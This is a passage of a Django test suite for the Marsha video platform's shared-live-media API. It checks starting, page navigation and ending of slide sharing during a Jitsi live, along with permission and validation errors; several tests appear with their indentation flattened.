for user in [UserFactory(), UserFactory(is_staff=True)]:
self.client.login(username=user.username, password="test")
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/end-sharing/"
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
response.json(),
{"detail": "Authentication credentials were not provided."},
)
    @override_settings(LIVE_CHAT_ENABLED=True)
    @override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
    @override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
    @override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
    @override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
    def test_api_video_shared_live_media_start_instructor_ready(self):
        """An instructor can start a ready shared live media.

        Starting the sharing must set `active_shared_live_media` (page 1) on the
        video, dispatch the updated video to the websocket groups, and return the
        full serialized video including the shared live media page URLs.
        """
        # A running Jitsi live with medialive/mediapackage infrastructure info.
        video = VideoFactory(
            playlist__title="foo bar",
            playlist__lti_id="course-v1:ufr+mathematics+00001",
            upload_state=PENDING,
            live_state=RUNNING,
            live_type=JITSI,
            live_info={
                "medialive": {
                    "input": {
                        "id": "medialive_input_1",
                        "endpoints": [
                            "https://live_endpoint1",
                            "https://live_endpoint2",
                        ],
                    },
                    "channel": {"id": "medialive_channel_1"},
                },
                "mediapackage": {
                    "id": "mediapackage_channel_1",
                    "endpoints": {
                        "hls": {
                            "id": "endpoint1",
                            "url": "https://channel_endpoint1/live.m3u8",
                        },
                    },
                },
            },
        )
        # A fully processed (READY) document attached to the live video.
        shared_live_media = SharedLiveMediaFactory(
            extension="pdf",
            title="slides",
            upload_state=READY,
            uploaded_on=datetime(2021, 11, 30, tzinfo=timezone.utc),
            nb_pages=3,
            video=video,
        )
        # Instructor/administrator JWT with update permission on the video.
        jwt_token = AccessToken()
        jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
        jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
        jwt_token.payload["permissions"] = {"can_update": True}
        jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}

        # Mock the websocket dispatch and the XMPP JWT generation so the
        # serialized "xmpp" section is deterministic.
        with mock.patch.object(
            channel_layers_utils, "dispatch_video_to_groups"
        ) as mock_dispatch_video_to_groups, mock.patch(
            "marsha.core.serializers.xmpp_utils.generate_jwt"
        ) as mock_jwt_encode:
            mock_jwt_encode.return_value = "xmpp_jwt"
            response = self.client.patch(
                f"/api/videos/{shared_live_media.video.id}/start-sharing/",
                HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
                data={"sharedlivemedia": str(shared_live_media.id)},
                content_type="application/json",
            )
            video.refresh_from_db()
            # The updated video must be pushed to all websocket consumers once.
            mock_dispatch_video_to_groups.assert_called_once_with(video)

            self.assertEqual(response.status_code, 200)
            content = response.json()
            # Full serialized video: the shared media is active on page 1 and
            # each page exposes its CloudFront SVG URL built from the stamp.
            self.assertEqual(
                content,
                {
                    "active_shared_live_media": {
                        "active_stamp": "1638230400",
                        "filename": "slides.pdf",
                        "id": str(shared_live_media.id),
                        "is_ready_to_show": True,
                        "nb_pages": shared_live_media.nb_pages,
                        "show_download": True,
                        "title": "slides",
                        "upload_state": READY,
                        "urls": {
                            "pages": {
                                "1": (
                                    "https://abc.cloudfront.net/"
                                    f"{video.id}/sharedlivemedia/"
                                    f"{shared_live_media.id}/1638230400_1.svg"
                                ),
                                "2": (
                                    "https://abc.cloudfront.net/"
                                    f"{video.id}/sharedlivemedia/"
                                    f"{shared_live_media.id}/1638230400_2.svg"
                                ),
                                "3": (
                                    "https://abc.cloudfront.net/"
                                    f"{video.id}/sharedlivemedia/"
                                    f"{shared_live_media.id}/1638230400_3.svg"
                                ),
                            }
                        },
                        "video": str(video.id),
                    },
                    "active_shared_live_media_page": 1,
                    "allow_recording": True,
                    "description": shared_live_media.video.description,
                    "estimated_duration": None,
                    "has_chat": True,
                    "has_live_media": True,
                    "id": str(shared_live_media.video.id),
                    "title": shared_live_media.video.title,
                    "active_stamp": None,
                    "is_public": False,
                    "is_ready_to_show": True,
                    "is_recording": False,
                    "is_scheduled": False,
                    "join_mode": "approval",
                    "show_download": True,
                    "starting_at": None,
                    "upload_state": "pending",
                    "thumbnail": None,
                    "timed_text_tracks": [],
                    "urls": {
                        "manifests": {
                            "hls": "https://channel_endpoint1/live.m3u8",
                        },
                        "mp4": {},
                        "thumbnails": {},
                    },
                    "should_use_subtitle_as_transcript": False,
                    "has_transcript": False,
                    "participants_asking_to_join": [],
                    "participants_in_discussion": [],
                    "playlist": {
                        "id": str(shared_live_media.video.playlist.id),
                        "title": "foo bar",
                        "lti_id": "course-v1:ufr+mathematics+00001",
                    },
                    "recording_time": 0,
                    "shared_live_medias": [
                        {
                            "active_stamp": "1638230400",
                            "filename": "slides.pdf",
                            "id": str(shared_live_media.id),
                            "is_ready_to_show": True,
                            "nb_pages": shared_live_media.nb_pages,
                            "show_download": True,
                            "title": "slides",
                            "upload_state": READY,
                            "urls": {
                                "pages": {
                                    "1": (
                                        "https://abc.cloudfront.net/"
                                        f"{video.id}/sharedlivemedia/"
                                        f"{shared_live_media.id}/1638230400_1.svg"
                                    ),
                                    "2": (
                                        "https://abc.cloudfront.net/"
                                        f"{video.id}/sharedlivemedia/"
                                        f"{shared_live_media.id}/1638230400_2.svg"
                                    ),
                                    "3": (
                                        "https://abc.cloudfront.net/"
                                        f"{video.id}/sharedlivemedia/"
                                        f"{shared_live_media.id}/1638230400_3.svg"
                                    ),
                                }
                            },
                            "video": str(video.id),
                        },
                    ],
                    "live_state": "running",
                    "live_info": {
                        "jitsi": {
                            "config_overwrite": {},
                            "domain": "meet.jit.si",
                            "external_api_url": "https://meet.jit.si/external_api.js",
                            "interface_config_overwrite": {},
                            "room_name": str(video.pk),
                        },
                        "medialive": {
                            "input": {
                                "endpoints": [
                                    "https://live_endpoint1",
                                    "https://live_endpoint2",
                                ],
                            }
                        },
                    },
                    "live_type": JITSI,
                    # XMPP section uses the mocked "xmpp_jwt" token and the
                    # domains set through @override_settings above.
                    "xmpp": {
                        "bosh_url": "https://xmpp-server.com/http-bind?token=xmpp_jwt",
                        "converse_persistent_store": "localStorage",
                        "websocket_url": None,
                        "conference_url": f"{video.id}@conference.xmpp-server.com",
                        "jid": "conference.xmpp-server.com",
                    },
                },
            )

            # The sharing state must also be persisted on the video itself.
            self.assertEqual(video.active_shared_live_media, shared_live_media)
            self.assertEqual(video.active_shared_live_media_page, 1)
    @override_settings(LIVE_CHAT_ENABLED=True)
    @override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
    @override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
    @override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
    @override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
    def test_api_video_shared_live_media_start_not_ready(self):
        """An instructor can not start a not ready shared live media.

        Every non-READY upload state must be rejected with a 400 and no
        websocket dispatch.
        """
        # A running Jitsi live on which the sharing attempts will be made.
        video = VideoFactory(
            playlist__title="foo bar",
            playlist__lti_id="course-v1:ufr+mathematics+00001",
            upload_state=PENDING,
            live_state=RUNNING,
            live_type=JITSI,
            live_info={
                "medialive": {
                    "input": {
                        "id": "medialive_input_1",
                        "endpoints": [
                            "https://live_endpoint1",
                            "https://live_endpoint2",
                        ],
                    },
                    "channel": {"id": "medialive_channel_1"},
                },
                "mediapackage": {
                    "id": "mediapackage_channel_1",
                    "endpoints": {
                        "hls": {
                            "id": "endpoint1",
                            "url": "https://channel_endpoint1/live.m3u8",
                        },
                    },
                },
            },
        )
        # Exercise every upload state that is not READY.
        for state in [
            PENDING,
            PROCESSING,
            ERROR,
            DELETED,
        ]:
            shared_live_media = SharedLiveMediaFactory(
                extension="pdf",
                title="slides",
                upload_state=state,
                uploaded_on=datetime(2021, 11, 30, tzinfo=timezone.utc),
                nb_pages=3,
                video=video,
            )
            # Instructor/administrator JWT with update permission.
            jwt_token = AccessToken()
            jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
            jwt_token.payload["roles"] = [
                random.choice(["instructor", "administrator"])
            ]
            jwt_token.payload["permissions"] = {"can_update": True}
            jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}

            with mock.patch.object(
                channel_layers_utils, "dispatch_video_to_groups"
            ) as mock_dispatch_video_to_groups:
                response = self.client.patch(
                    f"/api/videos/{video.id}/start-sharing/",
                    HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
                    data={"sharedlivemedia": str(shared_live_media.id)},
                    content_type="application/json",
                )
                # Nothing must be broadcast when the media is not ready.
                mock_dispatch_video_to_groups.assert_not_called()

                self.assertEqual(response.status_code, 400)
                self.assertEqual(
                    response.json(), {"detail": "Shared live media is not ready."}
                )
def test_api_video_shared_live_media_start_wrong_video_id(self):
"""An instructor can not start a shared live media
if related video doesn't match the JWT ressource."""
shared_live_media = SharedLiveMediaFactory()
other_shared_live_media = SharedLiveMediaFactory()
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(other_shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"sharedlivemedia": str(shared_live_media.id)},
content_type="application/json",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
response.json(),
{"detail": "You do not have permission to perform this action."},
)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_start_wrong_sharedlivemedia_id(self):
"""An instructor can not start a shared live media if the video is not related."""
shared_live_media = SharedLiveMediaFactory()
other_shared_live_media = SharedLiveMediaFactory(upload_state=READY)
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/start-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"sharedlivemedia": str(other_shared_live_media.id)},
content_type="application/json",
)
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 404)
    @override_settings(LIVE_CHAT_ENABLED=True)
    @override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
    @override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
    @override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
    @override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
    def test_api_video_shared_live_media_start_already_started(self):
        """An instructor can not start a shared live media
        if related video shared live media has started."""
        # The video already has an active shared live media, so any new
        # start-sharing request must be rejected.
        video = VideoFactory(
            playlist__title="foo bar",
            playlist__lti_id="course-v1:ufr+mathematics+00001",
            active_shared_live_media=SharedLiveMediaFactory(),
            upload_state=PENDING,
            live_state=RUNNING,
            live_type=JITSI,
            live_info={
                "medialive": {
                    "input": {
                        "id": "medialive_input_1",
                        "endpoints": [
                            "https://live_endpoint1",
                            "https://live_endpoint2",
                        ],
                    },
                    "channel": {"id": "medialive_channel_1"},
                },
                "mediapackage": {
                    "id": "mediapackage_channel_1",
                    "endpoints": {
                        "hls": {
                            "id": "endpoint1",
                            "url": "https://channel_endpoint1/live.m3u8",
                        },
                    },
                },
            },
        )
        # A second media on the same video, candidate for the rejected request.
        shared_live_media = SharedLiveMediaFactory(video=video)

        # Instructor/administrator JWT with update permission on the video.
        jwt_token = AccessToken()
        jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
        jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
        jwt_token.payload["permissions"] = {"can_update": True}
        jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}

        with mock.patch.object(
            channel_layers_utils, "dispatch_video_to_groups"
        ) as mock_dispatch_video_to_groups:
            response = self.client.patch(
                f"/api/videos/{shared_live_media.video.id}/start-sharing/",
                HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
                data={"sharedlivemedia": str(shared_live_media.id)},
                content_type="application/json",
            )
            self.assertEqual(response.status_code, 400)
            self.assertEqual(response.json(), {"detail": "Video is already sharing."})
            # No websocket broadcast when the request is rejected.
            mock_dispatch_video_to_groups.assert_not_called()
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_navigate_instructor(self):
"""An instructor can navigate in a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups, mock.patch(
"marsha.core.serializers.xmpp_utils.generate_jwt"
) as mock_jwt_encode:
mock_jwt_encode.return_value = "xmpp_jwt"
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": 2},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_called_once_with(video)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(
{
"active_shared_live_media": {
"active_stamp": None,
"filename": None,
"id": str(shared_live_media.id),
"is_ready_to_show": False,
"nb_pages": shared_live_media.nb_pages,
"show_download": True,
"title": None,
"upload_state": "pending",
"urls": None,
"video": str(video.id),
},
"active_shared_live_media_page": 2,
"allow_recording": True,
"description": shared_live_media.video.description,
"estimated_duration": None,
"has_chat": True,
"has_live_media": True,
"id": str(shared_live_media.video.id),
"title": shared_live_media.video.title,
"active_stamp": None,
"is_public": False,
"is_ready_to_show": True,
"is_recording": False,
"is_scheduled": False,
"join_mode": "approval",
"show_download": True,
"starting_at": None,
"upload_state": "pending",
"thumbnail": None,
"timed_text_tracks": [],
"urls": {
"manifests": {
"hls": "https://channel_endpoint1/live.m3u8",
},
"mp4": {},
"thumbnails": {},
},
"should_use_subtitle_as_transcript": False,
"has_transcript": False,
"participants_asking_to_join": [],
"participants_in_discussion": [],
"playlist": {
"id": str(shared_live_media.video.playlist.id),
"title": "foo bar",
"lti_id": "course-v1:ufr+mathematics+00001",
},
"recording_time": 0,
"shared_live_medias": [
{
"active_stamp": None,
"filename": None,
"id": str(shared_live_media.id),
"is_ready_to_show": False,
"nb_pages": shared_live_media.nb_pages,
"show_download": True,
"title": None,
"upload_state": "pending",
"urls": None,
"video": str(video.id),
}
],
"live_state": "running",
"live_info": {
"jitsi": {
"config_overwrite": {},
"domain": "meet.jit.si",
"external_api_url": "https://meet.jit.si/external_api.js",
"interface_config_overwrite": {},
"room_name": str(video.pk),
},
"medialive": {
"input": {
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
}
},
},
"live_type": JITSI,
"xmpp": {
"bosh_url": "https://xmpp-server.com/http-bind?token=xmpp_jwt",
"converse_persistent_store": "localStorage",
"websocket_url": None,
"conference_url": f"{video.id}@conference.xmpp-server.com",
"jid": "conference.xmpp-server.com",
},
},
content,
)
self.assertEqual(video.active_shared_live_media, shared_live_media)
self.assertEqual(video.active_shared_live_media_page, 2)
def test_api_video_shared_live_media_navigate_no_active(self):
"""An instructor can not navigate if no active shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=2)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": 2},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "No shared live media."})
self.assertEqual(video.active_shared_live_media, None)
self.assertEqual(video.active_shared_live_media_page, None)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_navigate_unexisting_page(self):
"""An instructor can not navigate to an unexisting page in a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": 7},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "Page does not exist."})
self.assertEqual(video.active_shared_live_media, shared_live_media)
self.assertEqual(video.active_shared_live_media_page, 1)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_navigate_undefined_page(self):
"""An instructor can not navigate to an undefined page in a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": None},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "Invalid page number."})
self.assertEqual(video.active_shared_live_media, shared_live_media)
self.assertEqual(video.active_shared_live_media_page, 1)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_navigate_missing_page(self):
"""An instructor can not navigate to an undefined page in a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "Invalid page number."})
self.assertEqual(video.active_shared_live_media, shared_live_media)
self.assertEqual(video.active_shared_live_media_page, 1)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_end_instructor(self):
"""An instructor can end a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups, mock.patch(
"marsha.core.serializers.xmpp_utils.generate_jwt"
) as mock_jwt_encode:
mock_jwt_encode.return_value = "xmpp_jwt"
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/end-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_called_once_with(video)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(
{
"active_shared_live_media": None,
"active_shared_live_media_page": None,
"allow_recording": True,
"description": shared_live_media.video.description,
"estimated_duration": None,
"has_chat": True,
"has_live_media": True,
"id": str(shared_live_media.video.id),
"title": shared_live_media.video.title,
"active_stamp": None,
"is_public": False,
"is_ready_to_show": True,
"is_recording": False,
"is_scheduled": False,
"join_mode": "approval",
"show_download": True,
"starting_at": None,
"upload_state": "pending",
"thumbnail": None,
"timed_text_tracks": [],
"urls": {
"manifests": {
"hls": "https://channel_endpoint1/live.m3u8",
},
"mp4": {},
"thumbnails": {},
},
"should_use_subtitle_as_transcript": False,
"has_transcript": False,
"participants_asking_to_join": [],
"participants_in_discussion": [],
"playlist": {
"id": str(shared_live_media.video.playlist.id),
"title": "foo bar",
"lti_id": "course-v1:ufr+mathematics+00001",
},
"recording_time": 0,
"shared_live_medias": [
{
"active_stamp": None,
"filename": None,
"id": str(shared_live_media.id),
"is_ready_to_show": False,
"nb_pages": shared_live_media.nb_pages,
"show_download": True,
"title": None,
"upload_state": "pending",
"urls": None,
"video": str(video.id),
}
],
"live_state": "running",
"live_info": {
"jitsi": {
"config_overwrite": {},
"domain": "meet.jit.si",
"external_api_url": "https://meet.jit.si/external_api.js",
"interface_config_overwrite": {},
"room_name": str(video.pk),
},
"medialive": {
"input": {
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
}
},
},
"live_type": JITSI,
"xmpp": {
"bosh_url": "https://xmpp-server.com/http-bind?token=xmpp_jwt",
"converse_persistent_store": "localStorage",
"websocket_url": None,
"conference_url": f"{video.id}@conference.xmpp-server.com",
"jid": "conference.xmpp-server.com",
},
},
content,
)
self.assertEqual(video.active_shared_live_media, None)
self.assertEqual(video.active_shared_live_media_page, None)
def test_api_video_shared_live_media_end_no_active(self):
"""An instructor can not end if no active shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=2)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{video.id}/end-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": 2},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "No shared live media."})
self.assertEqual(video.active_shared_live_media, None)
self.assertEqual(video.active_shared_live_media_page, None)
